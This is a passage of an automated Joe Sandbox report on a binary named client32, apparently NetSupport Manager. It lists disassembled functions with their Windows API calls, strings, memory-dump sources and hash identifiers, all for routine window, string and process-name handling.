                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                  • String ID: CLTCONN.CPP$NSMW16Class
                                                                                  • API String ID: 4104200039-3790257117
                                                                                  • Opcode ID: 2f3160cb8d4d3e9d4d4fb5de1e8df60238232f5b231a300af43937cf6ba75c4c
                                                                                  • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                                  • Opcode Fuzzy Hash: 2f3160cb8d4d3e9d4d4fb5de1e8df60238232f5b231a300af43937cf6ba75c4c
                                                                                  • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                                  Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                                  • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                                  • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                                  • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 490496107-2775872530
                                                                                  • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                  • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                                  • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                  • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                                  Function 110416A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 108librarythreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClassNameA.USER32(?,?,00000080), ref: 110416E7
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 11041719
                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749
                                                                                    • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                    • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                    • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 110417DD
                                                                                  • FreeLibrary.KERNEL32(?), ref: 110417EE
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
                                                                                  • String ID: NSSWControl32$pcinssui.exe$psapi.dll
                                                                                  • API String ID: 2388757878-1455766584
                                                                                  • Opcode ID: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                  • Instruction ID: 52c903991e8a4b03fd7171fe37ee29b83fe9f1de1022b00e10817fd4b2db0e2c
                                                                                  • Opcode Fuzzy Hash: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                  • Instruction Fuzzy Hash: 4E411A75E412299FEB10CF65CC94BEAFBB8FB09304F5045E9E91993640D770AA848F50
                                                                                  Function 11023470 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowTextLengthA.USER32(?), ref: 11023491
                                                                                  • GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
                                                                                  • ShowWindow.USER32(00000000), ref: 110234D7
                                                                                  • GetDlgItem.USER32(00000000,000013AB), ref: 11023521
                                                                                  • ShowWindow.USER32(00000000), ref: 11023524
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • GetDlgItem.USER32(00000000,?), ref: 1102356B
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                  • API String ID: 3823882759-1986719024
                                                                                  • Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                  • Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
                                                                                  • Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                  • Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
                                                                                  Function 11147090 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76librarytimeloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76938400), ref: 11145CA0
                                                                                    • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                    • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                    • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                  • LoadLibraryA.KERNEL32(secur32.dll,50D94AA1,?,?,?), ref: 111470D1
                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
                                                                                  • timeGetTime.WINMM(?,?), ref: 111470FC
                                                                                  • timeGetTime.WINMM(?,?), ref: 11147113
                                                                                  • GetLastError.KERNEL32(?,?), ref: 11147119
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                                                  • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                                                  • API String ID: 2282859717-3523682560
                                                                                  • Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                  • Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
                                                                                  • Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                  • Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
                                                                                  Function 110377F0 Relevance: 15.2, APIs: 10, Instructions: 228COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
                                                                                  • SelectObject.GDI32(?,?), ref: 11037872
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
                                                                                  • GetBkColor.GDI32(?), ref: 11037A5C
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9
                                                                                    • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                    • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                    • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
                                                                                  • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
                                                                                  • DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
                                                                                  • DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
                                                                                  • SelectObject.GDI32(?,00000000), ref: 11037B49
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
                                                                                  • String ID:
                                                                                  • API String ID: 649858571-0
                                                                                  • Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                  • Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
                                                                                  • Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                  • Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
                                                                                  Function 11025480 Relevance: 15.2, APIs: 10, Instructions: 207windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFocus.USER32(?), ref: 110254CE
                                                                                  • GetDlgItem.USER32(?,00001396), ref: 110254E2
                                                                                  • CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
                                                                                  • ShowCaret.USER32(00000000), ref: 11025515
                                                                                  • DestroyCaret.USER32 ref: 11025529
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Caret$CreateDestroyFocusItemShow
                                                                                  • String ID:
                                                                                  • API String ID: 3189774202-0
                                                                                  • Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                  • Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
                                                                                  • Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                  • Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
                                                                                  Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                    • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                    • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                    • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                  • _memmove.LIBCMT ref: 11035267
                                                                                  • _memmove.LIBCMT ref: 1103528B
                                                                                  • _memmove.LIBCMT ref: 110352C5
                                                                                  • _memmove.LIBCMT ref: 110352E1
                                                                                  • std::exception::exception.LIBCMT ref: 1103532B
                                                                                  • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                  • String ID: deque<T> too long
                                                                                  • API String ID: 827257264-309773918
                                                                                  • Opcode ID: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
                                                                                  • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                                  • Opcode Fuzzy Hash: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
                                                                                  • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                                  Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                    • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                    • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                    • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                  • _memmove.LIBCMT ref: 110193F7
                                                                                  • _memmove.LIBCMT ref: 1101941B
                                                                                  • _memmove.LIBCMT ref: 11019455
                                                                                  • _memmove.LIBCMT ref: 11019471
                                                                                  • std::exception::exception.LIBCMT ref: 110194BB
                                                                                  • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                  • String ID: deque<T> too long
                                                                                  • API String ID: 827257264-309773918
                                                                                  • Opcode ID: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
                                                                                  • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                  • Opcode Fuzzy Hash: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
                                                                                  • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                                  Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A
                                                                                  • GetWindowRect.USER32(?,?), ref: 111194E1
                                                                                  • MapWindowPoints.USER32(00000000,111239E6,?,00000002), ref: 111194FA
                                                                                  • GetClientRect.USER32(?,?), ref: 11119508
                                                                                  • GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
                                                                                  • GetSystemMetrics.USER32(00000003), ref: 11119559
                                                                                  • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
                                                                                  • GetSystemMetrics.USER32(00000002), ref: 11119576
                                                                                  Strings
                                                                                  • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
